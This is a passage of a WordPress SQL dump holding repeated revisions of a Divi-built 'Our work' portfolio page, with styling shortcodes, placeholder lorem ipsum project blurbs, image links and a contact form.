button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Work','','inherit','closed','closed','','396-revision-v1','','','2020-08-08 18:56:09','2020-08-08 18:56:09','',396,'https://wthtest1.in8.cdn-alpha.com/2020/08/08/396-revision-v1/',0,'revision','',0);
INSERT INTO `wp_posts` VALUES (670,1,'2020-08-08 18:56:42','2020-08-08 18:56:42','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"|||\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>Our work</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off%22\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Projects Section\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"50px||50px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 01\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]01\r[/et_pb_text][et_pb_cta title=\"Wet & Dry - Corporate Catalogue\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum.\r[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-b1-1.jpg\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Brochure-catalogue\" title_text=\"800x800 b1 (1)\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 02\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Creative graphic designing\" title_text=\"Creative graphic designing\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]02\r[/et_pb_text][et_pb_cta title=\"Enkuber - App Development\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum.\r[/et_pb_cta][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 03\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]03\r[/et_pb_text][et_pb_cta title=\"Iqra - Business Development\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum.\r[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 04\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-04-1.jpg\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]04\r[/et_pb_text][et_pb_cta title=\"Ninza - Branding Identity\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum.\r[/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\" global_module=\"630\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Work','','inherit','closed','closed','','396-revision-v1','','','2020-08-08 18:56:42','2020-08-08 18:56:42','',396,'https://wthtest1.in8.cdn-alpha.com/2020/08/08/396-revision-v1/',0,'revision','',0),(671,1,'2020-08-08 18:57:05','2020-08-08 18:57:05','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"|||\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>Our work</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off%22\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Projects Section\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"50px||50px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 01\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]01\r[/et_pb_text][et_pb_cta title=\"Wet & Dry - Corporate Catalogue\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum.\r[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-b1-1.jpg\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Brochure-catalogue\" title_text=\"800x800 b1 (1)\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 02\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Creative graphic designing\" title_text=\"Creative graphic designing\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]02\r[/et_pb_text][et_pb_cta title=\"Enkuber - App Development\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" 